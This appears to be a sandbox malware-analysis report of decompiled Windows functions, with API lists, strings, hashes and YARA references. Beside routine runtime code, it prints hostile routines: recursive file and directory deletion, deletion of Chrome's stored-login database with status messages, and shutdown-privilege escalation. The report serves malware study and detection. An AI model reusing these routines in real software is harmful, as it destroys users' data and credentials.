Opcode Fuzzy Hash: 69f3294584151d4bbc983575cb0f2afbb33c32fe8a415b75f911f7a7653dd91e
Instruction Fuzzy Hash: 4351BF705083029FC714EF20D865F9B77A8EFC5314F10482EF552672D1EA38AA49CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0044143E, Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370
timeCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0044143E(void* __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				char _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				signed int _t85;
				signed int _t89;
				signed int _t91;
				long _t93;
				signed int* _t96;
				signed int _t99;
				signed int _t102;
				signed int _t106;
				void* _t113;
				signed int _t116;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t128;
				signed int _t129;
				void* _t132;
				void* _t134;
				signed int _t135;
				signed int _t137;
				void* _t140;
				intOrPtr _t141;
				void* _t143;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t166;
				signed int _t167;
				intOrPtr* _t168;
				void* _t169;
				intOrPtr _t170;
				void* _t171;
				signed int _t172;
				int _t176;
				signed int _t178;
				char** _t179;
				signed int _t183;
				signed int _t184;
				void* _t191;
				signed int _t192;
				void* _t193;
				signed int _t194;

				_t178 = __esi;
				_t171 = __edi;
				_t65 = E0044107D();
				_v8 = _v8 & 0x00000000;
				_t137 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t137;
				if(E004410DB( &_v8) != 0 || E00441083( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0043603A();
					asm("int3");
					_t191 = _t193;
					_t194 = _t193 - 0x10;
					_push(_t137);
					_t179 = E0044107D();
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E004410DB( &_v52);
					_t143 = _t178;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E0043603A();
						asm("int3");
						_push(_t191);
						_t192 = _t194;
						_t74 =  *0x46900c; // 0x7c295e5c
						_v100 = _t74 ^ _t192;
						 *0x469344 =  *0x469344 | 0xffffffff;
						 *0x469338 =  *0x469338 | 0xffffffff;
						_push(0);
						_push(_t179);
						_push(_t171);
						_t139 = "TZ";
						_t172 = 0;
						 *0x46a748 = 0;
						_t78 = E00438F25(__eflags,  &_v360,  &_v356, 0x100, "TZ");
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t184 = E0043E13D(_t143, _v276);
								__eflags = _t184;
								if(__eflags != 0) {
									_t85 = E00438F25(__eflags,  &_v280, _t184, _v276, _t139);
									__eflags = _t85;
									if(_t85 == 0) {
										E0043E9A5(0);
										_t172 = _t184;
									} else {
										_push(_t184);
										goto L72;
									}
								} else {
									_push(0);
									L72:
									E0043E9A5();
								}
							}
						} else {
							_t172 =  &_v272;
						}
						asm("sbb esi, esi");
						_t183 =  ~(_t172 -  &_v272) & _t172;
						__eflags = _t172;
						if(_t172 == 0) {
							L80:
							L47();
						} else {
							__eflags =  *_t172;
							if(__eflags == 0) {
								goto L80;
							} else {
								_push(_t172);
								E0044143E(_t139, _t172, _t183, __eflags);
							}
						}
						E0043E9A5(_t183);
						__eflags = _v16 ^ _t192;
						return E0042F3BB(_v16 ^ _t192);
					} else {
						_t89 = E00441083( &_v16);
						_pop(_t143);
						__eflags = _t89;
						if(_t89 != 0) {
							goto L66;
						} else {
							_t91 = E004410AF( &_v20);
							_pop(_t143);
							__eflags = _t91;
							if(_t91 != 0) {
								goto L66;
							} else {
								E0043E9A5( *0x46a740);
								 *0x46a740 = 0;
								 *_t194 = 0x46a750;
								_t93 = GetTimeZoneInformation(??);
								__eflags = _t93 - 0xffffffff;
								if(_t93 != 0xffffffff) {
									_t150 =  *0x46a750 * 0x3c;
									_t167 =  *0x46a7a4; // 0x0
									_push(_t171);
									 *0x46a748 = 1;
									_v12 = _t150;
									__eflags =  *0x46a796; // 0x0
									if(__eflags != 0) {
										_t151 = _t150 + _t167 * 0x3c;
										__eflags = _t151;
										_v12 = _t151;
									}
									__eflags =  *0x46a7ea; // 0x0
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t106 =  *0x46a7f8; // 0x0
										__eflags = _t106;
										if(_t106 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t106 - _t167) * 0x3c;
										}
									}
									_t176 = E0043DD0C(0, _t167);
									_t99 = WideCharToMultiByte(_t176, 0, 0x46a754, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
									__eflags = _t99;
									if(_t99 == 0) {
										L60:
										 *( *_t179) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t179)[0x3f] = 0;
										}
									}
									_t102 = WideCharToMultiByte(_t176, 0, 0x46a7a8, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
									__eflags = _t102;
									if(_t102 == 0) {
										L64:
										 *(_t179[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t179[1][0x3f] = 0;
										}
									}
								}
								 *(E00441077()) = _v12;
								 *((intOrPtr*)(E0044106B())) = _v16;
								_t96 = E00441071();
								 *_t96 = _v20;
								return _t96;
							}
						}
					}
				} else {
					_t168 =  *0x46a740; // 0x0
					_t178 = _a4;
					if(_t168 == 0) {
						L12:
						E0043E9A5(_t168);
						_t154 = _t178;
						_t12 = _t154 + 1; // 0x44182f
						_t169 = _t12;
						do {
							_t113 =  *_t154;
							_t154 = _t154 + 1;
						} while (_t113 != 0);
						_t13 = _t154 - _t169 + 1; // 0x441830
						 *0x46a740 = E0043E13D(_t154 - _t169, _t13);
						_t116 = E0043E9A5(0);
						_t170 =  *0x46a740; // 0x0
						if(_t170 == 0) {
							goto L45;
						} else {
							_t158 = _t178;
							_push(_t171);
							_t14 = _t158 + 1; // 0x44182f
							_t171 = _t14;
							do {
								_t117 =  *_t158;
								_t158 = _t158 + 1;
							} while (_t117 != 0);
							_t15 = _t158 - _t171 + 1; // 0x441830
							_t119 = E004400C6(_t170, _t15, _t178);
							_t193 = _t193 + 0xc;
							if(_t119 == 0) {
								_t171 = 3;
								_push(_t171);
								_t120 = E0044BF69(_t159,  *_t137, 0x40, _t178);
								_t193 = _t193 + 0x10;
								if(_t120 == 0) {
									while( *_t178 != 0) {
										_t178 = _t178 + 1;
										_t171 = _t171 - 1;
										if(_t171 != 0) {
											continue;
										}
										break;
									}
									_pop(_t171);
									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
									if(_t137 != 0) {
										_t178 = _t178 + 1;
									}
									_t161 = E00435E19(_t159, _t178) * 0xe10;
									_v8 = _t161;
									while(1) {
										_t122 =  *_t178;
										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
											break;
										}
										_t178 = _t178 + 1;
									}
									__eflags =  *_t178 - 0x3a;
									if( *_t178 == 0x3a) {
										_t178 = _t178 + 1;
										_t161 = _v8 + E00435E19(_t161, _t178) * 0x3c;
										_v8 = _t161;
										while(1) {
											_t132 =  *_t178;
											__eflags = _t132 - 0x30;
											if(_t132 < 0x30) {
												break;
											}
											__eflags = _t132 - 0x39;
											if(_t132 <= 0x39) {
												_t178 = _t178 + 1;
												__eflags = _t178;
												continue;
											}
											break;
										}
										__eflags =  *_t178 - 0x3a;
										if( *_t178 == 0x3a) {
											_t178 = _t178 + 1;
											_t161 = _v8 + E00435E19(_t161, _t178);
											_v8 = _t161;
											while(1) {
												_t134 =  *_t178;
												__eflags = _t134 - 0x30;
												if(_t134 < 0x30) {
													goto L38;
												}
												__eflags = _t134 - 0x39;
												if(_t134 <= 0x39) {
													_t178 = _t178 + 1;
													__eflags = _t178;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t137;
									if(_t137 != 0) {
										_v8 = _t161;
									}
									__eflags =  *_t178;
									_t124 = 0 |  *_t178 != 0x00000000;
									_v16 = _t124;
									__eflags = _t124;
									_t125 = _v12;
									if(_t124 == 0) {
										_t29 = _t125 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										L44:
										 *(E00441077()) = _v8;
										_t128 = E0044106B();
										 *_t128 = _v16;
										return _t128;
									}
									_push(3);
									_t28 = _t125 + 4; // 0xfffffddd
									_t129 = E0044BF69(_t161,  *_t28, 0x40, _t178);
									_t193 = _t193 + 0x10;
									__eflags = _t129;
									if(_t129 == 0) {
										goto L44;
									}
								}
							}
							goto L46;
						}
					} else {
						_t166 = _t168;
						_t135 = _t178;
						while(1) {
							_t140 =  *_t135;
							if(_t140 !=  *_t166) {
								break;
							}
							if(_t140 == 0) {
								L8:
								_t116 = 0;
							} else {
								_t9 = _t135 + 1; // 0xdde805eb
								_t141 =  *_t9;
								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
									break;
								} else {
									_t135 = _t135 + 2;
									_t166 = _t166 + 2;
									if(_t141 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t116 == 0) {
								L45:
								return _t116;
							} else {
								_t137 = _v12;
								goto L12;
							}
							goto L82;
						}
						asm("sbb eax, eax");
						_t116 = _t135 | 0x00000001;
						__eflags = _t116;
						goto L10;
					}
				}
				L82:
			}

0x0044143e
0x0044143e
0x00441448
0x0044144d
0x00441451
0x00441453
0x0044145b
0x00441466
0x00441606
0x00441608
0x00441609
0x0044160a
0x0044160b
0x0044160c
0x0044160d
0x00441612
0x00441616
0x00441618
0x0044161b
0x00441622
0x00441629
0x0044162d
0x00441630
0x00441633
0x00441638
0x00441639
0x0044163b
0x00441763
0x00441763
0x00441764
0x00441765
0x00441766
0x00441767
0x00441768
0x0044176d
0x00441770
0x00441771
0x00441779
0x00441780
0x00441783
0x00441790
0x00441797
0x00441798
0x00441799
0x0044179a
0x0044179f
0x004417ae
0x004417b5
0x004417bd
0x004417bf
0x004417c9
0x004417cc
0x004417d9
0x004417dc
0x004417de
0x004417f7
0x004417ff
0x00441801
0x00441807
0x0044180c
0x00441803
0x00441803
0x00000000
0x00441803
0x004417e0
0x004417e0
0x004417e1
0x004417e1
0x004417e1
0x0044180e
0x004417c1
0x004417c1
0x004417c1
0x0044181b
0x0044181d
0x0044181f
0x00441821
0x00441831
0x00441831
0x00441823
0x00441823
0x00441826
0x00000000
0x00441828
0x00441828
0x00441829
0x0044182e
0x00441826
0x00441837
0x00441842
0x0044184d
0x00441641
0x00441645
0x0044164a
0x0044164b
0x0044164d
0x00000000
0x00441653
0x00441657
0x0044165c
0x0044165d
0x0044165f
0x00000000
0x00441665
0x0044166b
0x00441670
0x00441676
0x0044167d
0x00441683
0x00441686
0x0044168c
0x00441693
0x00441699
0x0044169d
0x004416a3
0x004416a6
0x004416ad
0x004416b2
0x004416b2
0x004416b4
0x004416b4
0x004416b7
0x004416be
0x004416d6
0x004416d6
0x004416d9
0x004416c0
0x004416c0
0x004416c5
0x004416c7
0x00000000
0x004416c9
0x004416cb
0x004416d1
0x004416d1
0x004416c7
0x004416e1
0x004416f5
0x004416fb
0x004416fd
0x0044170b
0x0044170d
0x004416ff
0x004416ff
0x00441702
0x00000000
0x00441704
0x00441706
0x00441706
0x00441702
0x00441722
0x00441729
0x0044172b
0x0044173a
0x0044173d
0x0044172d
0x0044172d
0x00441730
0x00000000
0x00441732
0x00441735
0x00441735
0x00441730
0x0044172b
0x00441747
0x00441751
0x00441756
0x0044175b
0x00441762
0x00441762
0x0044165f
0x0044164d
0x0044147e
0x0044147e
0x00441484
0x00441489
0x004414bf
0x004414c0
0x004414c6
0x004414c8
0x004414c8
0x004414cb
0x004414cb
0x004414cd
0x004414ce
0x004414d4
0x004414df
0x004414e4
0x004414e9
0x004414f3
0x00000000
0x004414f9
0x004414f9
0x004414fb
0x004414fc
0x004414fc
0x004414ff
0x004414ff
0x00441501
0x00441502
0x00441509
0x0044150e
0x00441513
0x00441518
0x00441520
0x00441521
0x00441527
0x0044152c
0x00441531
0x00441537
0x0044153c
0x0044153d
0x00441540
0x00000000
0x00000000
0x00000000
0x00441540
0x00441545
0x00441546
0x0044154b
0x0044154d
0x0044154d
0x00441555
0x0044155b
0x0044155e
0x0044155e
0x00441562
0x00000000
0x00000000
0x0044156c
0x0044156c
0x0044156f
0x00441572
0x00441574
0x00441582
0x00441584
0x0044158e
0x0044158e
0x00441590
0x00441592
0x00000000
0x00000000
0x00441589
0x0044158b
0x0044158d
0x0044158d
0x00000000
0x0044158d
0x00000000
0x0044158b
0x00441594
0x00441597
0x00441599
0x004415a4
0x004415a6
0x004415b0
0x004415b0
0x004415b2
0x004415b4
0x00000000
0x00000000
0x004415ab
0x004415ad
0x004415af
0x004415af
0x00000000
0x004415af
0x00000000
0x004415ad
0x004415b0
0x00441597
0x004415b6
0x004415b6
0x004415b8
0x004415bc
0x004415bc
0x004415c1
0x004415c3
0x004415c6
0x004415c9
0x004415cb
0x004415ce
0x004415e6
0x004415e9
0x004415ec
0x004415f4
0x004415f9
0x004415fe
0x00000000
0x004415fe
0x004415d0
0x004415d5
0x004415d8
0x004415dd
0x004415e0
0x004415e2
0x00000000
0x00000000
0x004415e4
0x00441531
0x00000000
0x00441518
0x0044148b
0x0044148b
0x0044148d
0x0044148f
0x0044148f
0x00441493
0x00000000
0x00000000
0x00441497
0x004414ab
0x004414ab
0x00441499
0x00441499
0x00441499
0x0044149f
0x00000000
0x004414a1
0x004414a1
0x004414a4
0x004414a9
0x00000000
0x00000000
0x00000000
0x00000000
0x004414a9
0x0044149f
0x004414b4
0x004414b6
0x00441605
0x00441605
0x004414bc
0x004414bc
0x00000000
0x004414bc
0x00000000
0x004414b6
0x004414af
0x004414b1
0x004414b1
0x00000000
0x004414b1
0x00441489
0x00000000

APIs

_free.LIBCMT ref: 004414C0
_free.LIBCMT ref: 004414E4
_free.LIBCMT ref: 0044166B
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,004580DC), ref: 0044167D
WideCharToMultiByte.KERNEL32(00000000,00000000,0046A754,000000FF,00000000,0000003F,00000000,?,?), ref: 004416F5
WideCharToMultiByte.KERNEL32(00000000,00000000,0046A7A8,000000FF,?,0000003F,00000000,?), ref: 00441722
_free.LIBCMT ref: 00441837

Strings

\^)|/, xrefs: 00441779

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID: \^)|/
API String ID: 314583886-265608074
Opcode ID: 2e6001e8b363689b0cc64e6a5fe01b4b004facc286de478ef3685f31e4582305
Instruction ID: 466ed36273c6ca42d27c0d78e965dbfc45899439b328712498969e12dbc3334e
Opcode Fuzzy Hash: 2e6001e8b363689b0cc64e6a5fe01b4b004facc286de478ef3685f31e4582305
Instruction Fuzzy Hash: E0C13871A00244ABEB20DF69CC41AAB7BB9EF45354F14416FE445973A1EB38CE82CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 004170D3, Relevance: 13.6, APIs: 9, Instructions: 147
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004170D3(WCHAR* __ecx) {
				char _v5;
				WCHAR* _v12;
				short _v532;
				short _v1052;
				struct _WIN32_FIND_DATAW _v1644;
				signed int _t52;
				intOrPtr _t53;
				char _t54;
				short _t55;
				signed int _t56;
				intOrPtr _t57;
				char _t58;
				signed int _t63;
				char _t68;
				void _t72;
				void _t73;
				signed int _t78;
				signed int _t84;
				void* _t86;
				intOrPtr* _t89;
				signed short* _t90;
				void* _t91;
				signed int _t95;
				void* _t100;
				void* _t102;
				signed short* _t103;
				void* _t106;
				void* _t107;
				signed int _t108;
				intOrPtr* _t110;
				void* _t112;
				void* _t118;
				void* _t120;
				void* _t123;
				void* _t124;

				_v12 = __ecx;
				_t103 = __ecx;
				_t118 =  &_v1052 - __ecx;
				do {
					_t52 =  *_t103 & 0x0000ffff;
					 *(_t118 + _t103) = _t52;
					_t103 =  &(_t103[1]);
				} while (_t52 != 0);
				_t89 =  &_v1052 - 2;
				do {
					_t53 =  *((intOrPtr*)(_t89 + 2));
					_t89 = _t89 + 2;
				} while (_t53 != 0);
				_t54 = L"\\*"; // 0x2a005c
				 *_t89 = _t54;
				_t106 =  &_v532 - __ecx;
				_t55 =  *0x464928; // 0x0
				 *((short*)(_t89 + 4)) = _t55;
				_t90 = __ecx;
				do {
					_t56 =  *_t90 & 0x0000ffff;
					 *(_t106 + _t90) = _t56;
					_t90 =  &(_t90[1]);
				} while (_t56 != 0);
				_t110 =  &_v532 - 2;
				do {
					_t57 =  *((intOrPtr*)(_t110 + 2));
					_t110 = _t110 + 2;
				} while (_t57 != 0);
				_t58 = "\\"; // 0x5c
				 *_t110 = _t58;
				_t86 = FindFirstFileW( &_v1052,  &_v1644);
				if(_t86 == 0xffffffff) {
					L34:
					return 0;
				}
				_t91 = 0;
				do {
					_t63 =  *(_t123 + _t91 - 0x210) & 0x0000ffff;
					_t91 = _t91 + 2;
					 *(_t123 + _t91 - 0x41a) = _t63;
				} while (_t63 != 0);
				_v5 = 1;
				do {
					if(FindNextFileW(_t86,  &_v1644) == 0) {
						if(GetLastError() != 0x12) {
							L33:
							FindClose(_t86);
							goto L34;
						}
						_t68 = 0;
						_v5 = 0;
						goto L23;
					}
					if(E0041705D( &(_v1644.cFileName)) != 0) {
						L22:
						_t68 = _v5;
						goto L23;
					}
					_t107 =  &(_v1644.cFileName);
					_t120 = _t107;
					do {
						_t72 =  *_t107;
						_t107 = _t107 + 2;
					} while (_t72 != 0);
					_t108 = _t107 - _t120;
					_t112 =  &_v532 - 2;
					do {
						_t73 =  *(_t112 + 2);
						_t112 = _t112 + 2;
					} while (_t73 != 0);
					_t95 = _t108 >> 2;
					memcpy(_t112, _t120, _t95 << 2);
					memcpy(_t120 + _t95 + _t95, _t120, _t108 & 0x00000003);
					_t124 = _t124 + 0x18;
					if((_v1644.dwFileAttributes & 0x00000010) == 0) {
						if((_v1644.dwFileAttributes & 0x00000001) != 0) {
							SetFileAttributesW( &_v532, 0x80);
						}
						if(DeleteFileW( &_v532) == 0) {
							goto L33;
						} else {
							_t100 = 0;
							do {
								_t78 =  *(_t123 + _t100 - 0x418) & 0x0000ffff;
								_t100 = _t100 + 2;
								 *(_t123 + _t100 - 0x212) = _t78;
							} while (_t78 != 0);
							goto L22;
						}
					}
					if(E004170D3( &_v532) == 0) {
						goto L33;
					}
					RemoveDirectoryW( &_v532);
					_t102 = 0;
					do {
						_t84 =  *(_t123 + _t102 - 0x418) & 0x0000ffff;
						_t102 = _t102 + 2;
						 *(_t123 + _t102 - 0x212) = _t84;
					} while (_t84 != 0);
					goto L22;
					L23:
				} while (_t68 != 0);
				FindClose(_t86);
				return RemoveDirectoryW(_v12);
			}

0x004170e7
0x004170ea
0x004170ec
0x004170ee
0x004170ee
0x004170f1
0x004170f5
0x004170f8
0x00417103
0x00417108
0x00417108
0x0041710c
0x0041710f
0x00417114
0x0041711f
0x00417121
0x00417123
0x00417129
0x0041712d
0x0041712f
0x0041712f
0x00417132
0x00417136
0x00417139
0x00417144
0x00417149
0x00417149
0x0041714d
0x00417150
0x00417155
0x0041715a
0x00417170
0x00417175
0x004172bd
0x00000000
0x004172bd
0x0041717b
0x0041717d
0x0041717d
0x00417185
0x00417188
0x00417190
0x00417195
0x00417199
0x004171a9
0x004172ad
0x004172b6
0x004172b7
0x00000000
0x004172b7
0x004172af
0x004172b1
0x00000000
0x004172b1
0x004171bc
0x0041723d
0x0041723d
0x00000000
0x0041723d
0x004171be
0x004171c6
0x004171c8
0x004171c8
0x004171cb
0x004171ce
0x004171d9
0x004171db
0x004171de
0x004171de
0x004171e2
0x004171e5
0x004171ec
0x004171ef
0x004171fd
0x004171fd
0x004171ff
0x00417261
0x0041726f
0x0041726f
0x00417284
0x00000000
0x00417286
0x00417288
0x0041728a
0x0041728a
0x00417292
0x00417295
0x0041729d
0x00000000
0x004172a2
0x00417284
0x0041720e
0x00000000
0x00000000
0x0041721b
0x00417223
0x00417225
0x00417225
0x0041722d
0x00417230
0x00417238
0x00000000
0x00417240
0x00417240
0x00417249
0x00000000

APIs

FindFirstFileW.KERNEL32(?,?,?,0046B4F8,00000001), ref: 0041716A
FindNextFileW.KERNEL32(00000000,?,?,0046B4F8,00000001), ref: 004171A1
RemoveDirectoryW.KERNEL32(?,?,0046B4F8,00000001), ref: 0041721B
FindClose.KERNEL32(00000000,?,0046B4F8,00000001), ref: 00417249
RemoveDirectoryW.KERNEL32(0046B4F8,?,0046B4F8,00000001), ref: 00417252
SetFileAttributesW.KERNEL32(?,00000080,?,0046B4F8,00000001), ref: 0041726F
DeleteFileW.KERNEL32(?,?,0046B4F8,00000001), ref: 0041727C
GetLastError.KERNEL32(?,0046B4F8,00000001), ref: 004172A4
FindClose.KERNEL32(00000000,?,0046B4F8,00000001), ref: 004172B7

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID:
API String ID: 2341273852-0
Opcode ID: 8c9d5ee205f598faecbf561c1b26b4d15e8eb155ea1e19569819cd62c9272cfb
Instruction ID: 2213b966b9922d90b7e653bb34968388685eddd05649525d4d55f6e0b8ffe599
Opcode Fuzzy Hash: 8c9d5ee205f598faecbf561c1b26b4d15e8eb155ea1e19569819cd62c9272cfb
Instruction Fuzzy Hash: C151D6355042198ACF24DFA8CC486FBB775BF58304F5041EAE84993251EB759EC7CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00448F70, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 00440492: GetLastError.KERNEL32(?,?,00434BF5,?,00000000,?,004362D0,?,00000000,?,00000000), ref: 00440496
Part of subcall function 00440492: _free.LIBCMT ref: 004404C9
Part of subcall function 00440492: SetLastError.KERNEL32(00000000,00000000,?,00000000), ref: 0044050A
Part of subcall function 00440492: _abort.LIBCMT ref: 00440510

Part of subcall function 00440492: _free.LIBCMT ref: 004404F1
Part of subcall function 00440492: SetLastError.KERNEL32(00000000,00000000,?,00000000), ref: 004404FE

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044907C
IsValidCodePage.KERNEL32(00000000), ref: 004490D7
IsValidLocale.KERNEL32(?,00000001), ref: 004490E6
GetLocaleInfoW.KERNEL32(?,00001001,0043CC9E,00000040,?,0043CDBE,00000055,00000000,?,?,00000055,00000000), ref: 0044912E
GetLocaleInfoW.KERNEL32(?,00001002,0043CD1E,00000040), ref: 0044914D

Strings

\^)|/, xrefs: 00448F78

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: \^)|/
API String ID: 745075371-265608074
Opcode ID: a718680f63b573c739774d5b3032a38af15d4e4e2221c3d87343acd0b3f706d8
Instruction ID: b13014ef0c61df40c41b80df702723ce33fb4380a4212a24e128991bd731e4ff
Opcode Fuzzy Hash: a718680f63b573c739774d5b3032a38af15d4e4e2221c3d87343acd0b3f706d8
Instruction Fuzzy Hash: 9C517E72A00205ABFB20DFA5CC45ABF73B8AF49701F04446FEA15E7251DB789D04DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00409EAC, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 00409EE8
GetLastError.KERNEL32 ref: 00409EF2

Strings

\AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 00409EB3
[Chrome StoredLogins found, cleared!], xrefs: 00409F18
[Chrome StoredLogins not found], xrefs: 00409F0C
UserProfile, xrefs: 00409EB8

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
API String ID: 2018770650-1062637481
Opcode ID: 1549a9905e9f1ce9f403b8b5bb65ddc0fc3dfa924b254e418821b753da72fcc0
Instruction ID: 68640d0e3cf11e0ab7590ec8390676d4925aa37a87cead837b8ffa9857b1293b
Opcode Fuzzy Hash: 1549a9905e9f1ce9f403b8b5bb65ddc0fc3dfa924b254e418821b753da72fcc0
Instruction Fuzzy Hash: 1A01A73164010667CA097A76CD1B8AF7728A951309750017FF901B61E3ED399D0996CA

Uniqueness

Uniqueness Score: -1.00%

Function 00413417, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00413417() {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;

				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
				return GetLastError() & 0xffffff00 | _t16 != 0x00000000;
			}

0x0041342b
0x0041343d
0x00413449
0x00413455
0x0041345c
0x00413471

APIs

GetCurrentProcess.KERNEL32(00000028,00412796,00000000,?,?,?,?,00412796), ref: 00413424
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,00412796), ref: 0041342B
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041343D
AdjustTokenPrivileges.ADVAPI32(00412796,00000000,?,00000000,00000000,00000000), ref: 0041345C
GetLastError.KERNEL32 ref: 00413462

Strings

SeShutdownPrivilege, xrefs: 00413437

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3534403312-3733053543
Opcode ID: 093ea5b245a9d09a601e62f1f5427e5a6ab91fbce77cd25f34adc359b9e64be3
Instruction ID: 89c2318ff307c08c24120019f05effc63dd2897ad10e4cae1283d26298008ad2
Opcode Fuzzy Hash: 093ea5b245a9d09a601e62f1f5427e5a6ab91fbce77cd25f34adc359b9e64be3
Instruction Fuzzy Hash: A1F0D075802219ABDB109B91DE4DEEF7F7CEF06616F114061BA05A1192D6B48B04C6F5

Uniqueness

Uniqueness Score: -1.00%

Function 004073C8, Relevance: 9.3, APIs: 6, Instructions: 323
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E004073C8(signed int __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t106;
				intOrPtr* _t111;
				signed int _t121;
				int _t127;
				void* _t133;
				void* _t154;
				void* _t157;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t172;
				void* _t181;
				signed int _t184;
				signed int _t185;
				signed int _t187;
				void* _t205;
				char* _t219;
				char* _t220;
				void* _t254;
				void* _t263;
				signed int _t266;
				void* _t272;
				void* _t278;
				void* _t280;
				intOrPtr _t281;
				void* _t282;
				void* _t283;
				void* _t286;

				_t254 = __edx;
				_t187 = __ecx;
				E00450448(0x4519c2, _t278);
				_t281 = _t280 - 0x300;
				 *((intOrPtr*)(_t278 - 0x10)) = _t281;
				_t184 = _t187;
				 *(_t278 - 0x18) = _t184;
				E0040201F(_t184, _t278 - 0x9c);
				 *(_t278 - 0x1c) =  *(_t278 - 0x1c) | 0xffffffff;
				 *_t184 = 0;
				 *(_t278 - 4) =  *(_t278 - 4) & 0x00000000;
				_t185 = _t184 + 4;
				E0040484C(_t185);
				_t282 = _t281 - 0x10;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t106 = E004048C2(_t254, _t263);
				_t288 = _t106;
				if(_t106 == 0) {
					_push(0);
					_push(0);
					goto L4;
				} else {
					_t282 = _t282 - 0x18;
					L00402ECA(_t185, _t282, E0040704B(_t278 - 0x6c, _t278 + 0x38, 0x46b218), _t288, _t278 + 0x50);
					_push(0x64);
					_t185 = _t185 & 0xffffff00 | L0040495D(_t185, _t185, _t178, _t288) == 0xffffffff;
					_t181 = L00401F11();
					_t290 = _t185;
					if(_t185 != 0) {
						L00404CC1(_t181,  *(_t278 - 0x18) + 4);
						 *((intOrPtr*)(_t278 - 0x20)) = 1;
						_push(0x467588);
						_t157 = _t278 - 0x20;
						L3:
						_push(_t157);
						L4:
						L0043170A();
					}
				}
				_t265 = E00402254(_t278 + 0x20, _t278 - 0x30);
